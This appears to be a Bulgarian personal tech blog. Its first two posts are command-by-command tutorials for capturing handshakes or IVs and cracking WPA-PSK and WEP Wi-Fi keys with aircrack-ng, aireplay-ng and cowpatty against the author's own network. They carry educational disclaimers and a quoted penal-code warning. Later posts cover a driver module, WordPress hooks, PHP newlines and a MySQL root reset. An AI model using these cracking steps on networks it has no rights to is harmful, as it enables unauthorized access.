Разбиване на Wireless с WPA encoding

Здравейте отново с мен Мартин Петров. Предния път ви демонстрирах как се разбива Wireless с WEP, а сега ще ви обясня как се разбива Wireless с WPA/PSK.

За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея .

След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг

# iwconfig wlan0 mode monitoring

След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел

# airodump-ng wlan0

Понеже търсим wireless със WPA кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.

След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем в Терминал 2 airodump за да събирем информация за съответната мрежа.

# airodump-ng -w wpa -c 6 --bssid 00:23:CD:D7:84:FC wlan0

Сега ще отворим Терминал 3 за да изпратим пакети за ре- оторизация. Ще трябва да използваме MAC адреса на клиента които можем да вземем от Терминал 1.

# aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0

След това ще погледнем Терминал 2 и ще видим горе в дясно WPA handshake: 00:23:CD:D7:84:FC с което приключваме събирането на пакети и пристъпваме към кракване на паролата.

За кракване на паролата ще използваме два метода единият е, чрез aircrack, а другият , чрез cowpatty

Първо ще реализираме кракване с aircrack

cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap

Сега ще направим кракване с cowpatty:

cd /pentest/wireless/cowpatty
./cowpatty -r /root/wpa-01.cap -f dict -s mpetrov_net

И двата метода успяват да кракнат паролата и да я изведат.

Видео демонстрация от youtube.com: Разбиване на Wireless с WPA encoding (youtube)
Видео демонстрация от vbox7.com:
Разбиване на Wireless с WPA encoding (vbox7)
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.

До скоро от mpetrov.net

PS: Това е истината-> EPRB

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

VN:F [1.9.22_1171]
Rating: 5.0/5 (5 votes cast)
VN:F [1.9.22_1171]
Rating: +3 (from 3 votes)

Разбиване на Wireless с WEP encoding

Тук ще демонстрирам как се декодира ключ от wireless мрежа с кодиране WEP. Правя този видео материал защото много отдавна очаквах някои да сподели тази демонстрация в нашето българско интернет пространство, но уви никои не го направи.

Тук ще опиша как можем да вземем ключа на wireless мрежа с WEP кодиране.

За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея ifconfig,iwconfig,airodump, aireplay и aircrack.

След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг

# iwconfig wlan0 mode monitoring;

След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел

# airodump-ng wlan0

Понеже търсим wireless със WEP кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.

След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем airodump за да събирем информация за съответната мрежа.

# airodump-ng -w wep -c 6 --bssid 00:23:CD:D7:84:FC wlan0 (postoqnno raboti)

Сега ще отворим още един терминал в които ще използваме ARP Reply attack за да увеличим броя на дейта пакетите и да вземем инициализиращите вектори или IV на избраният по- рано Access Point.

# aireplay-ng -3 -b 00:23:CD:D7:84:FC wlan0

Оставяме aireplay пуснат и наблюдаваме Терминал 1. За да имаме успеваемост на разбиване на ключа е необходимо да съберем над 20 000 дейта пакети, след което ще прекратим airodump-ng и aireplay-ng.

След като събрахме над 22 000 дейта пакети прекратяваме airodump с Контрол и C и aireplay с Контрол и C

Сега имаме всичко необходимо за да декодираме ключа на wireless мрежата "mpetrov_net" като използваме aircrack за целта.

aircrack-ng wep-03.cap

Тук виждаме, че ключът е 9781238761 и е кракнат със 100% успеваемост.

Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.

Видео материал във vbox7.com: Разбиване на Wireless с encoding Wep
Видео материал във youtube.com: Разбиване на Wireless с encoding Wep

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

VN:F [1.9.22_1171]
Rating: 5.0/5 (3 votes cast)
VN:F [1.9.22_1171]
Rating: +2 (from 2 votes)

Linux модул за TP-LINK TL-WN321G

Идеята на този пост е да обясни на начинаещите как да ползват своя wireless usb tplink wn321g под Linux. Модула за TP-LINK TL-WN321G е : rt73usb

За да го заредите изпълнете: modprobe rt73usb

За да видите дали е зареден правилно се изпълнява: iwconfig :)

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Полезни неща за писачите на WordPress плъгини

Преди малко трябваше да напиша на бързо един прост плъгин за WordPress които да изпраща съдържанието на публикацията и линка към нея в един приятелски сайт. След като го направих реших да напиша по- важните неща от него:

1. Извеждане на съдържание на публикацията:
$_POST['post_content']

2. Извеждане на заглавието на публикацията:
$_POST['post_title']

3. Извеждане на линк на публикацията:
global $post_ID;
get_permalink($post_ID);

4. Добавяне на действие при публикуване:
add_action('publish_post', 'submit_friend_site');

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Как да проверя какъв е моят IP Address

Наложи ми се да пусна една малка уеб тулка която да ми показва публичният IP адрес и понеже е супер лесна за реализация реших да направя и допълнение което да извежда информация за браузъра на потребителя. Ето връзка и към тази тулка: Как да проверява какъв е моят IP Address

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Как да проверя какъв е моят IP Address

Наложи ми се да пусна една малка уеб тулка която да ми показва публичният IP адрес и понеже е супер лесна за реализация реших да направя и допълнение което да извежда информация за браузъра на потребителя. Ето връзка и към тази тулка: Как да проверява какъв е моят IP Address

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Нов ред (на Windows) в PHP

За да се направи нов ред в php(при echo примерно) като на Windows трябва да се използва не само "\n" за нов ред, а комбинацията от "\r\n" т.е.

Пример за нов ред в php като на Windows:

echo "Martin\r\nPetrov\r\n";

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Как да възстановим своята root парола за MySQL

Ако на някои му се случи да си забрави root паролата за MySQL да изпълни следните стъпки и тя ще бъде нулирана(или въведена нова такава):

#Това убива стартирания mysqld(най- добре е да го спрете нормално,но  ако не можете просто го килнете както е по- долу)
killall -9 mysqld_safe && killall -9 mysqld;

#Стартираме го без права
mysqld_safe --skip-grant-tables --old-passwords &

#Сетваме нулева парола за root
mysql -uroot -e "UPDATE mysql.user SET Password=PASSWORD(") WHERE User='root'";

Това е всичко от мен приятели (rofl) :)

PS: Има и друг вариант с mysql-init : mysqld_safe --init-file=mysql-init &

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Нови реферати в referati.org

Снощи добавих 285 реферати които ми изпратиха приятели/познати и посетители на referati.org . Рефератите са от категории "Информационни технологии" и "Литература".
Ето някои интересни реферати от "Информационни технологии":

Уроци по .NET
Мостове и Маршрутизатори
Изкуственият интелект
Компютърно зрение- Симулиране на невронни мрежи
Линукс. Трикове за Bash
Безжични комуникации и оборудване в INTERNEТ
Системи бази данни и бази знания

Секция "Литература":

Природа и цивилизация във Вазовото стихотворение Отечество любезно
Иван Вазов -- Една българка -- Ролята на деня и нощта в разказа

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Личен Блог на Мартин Петров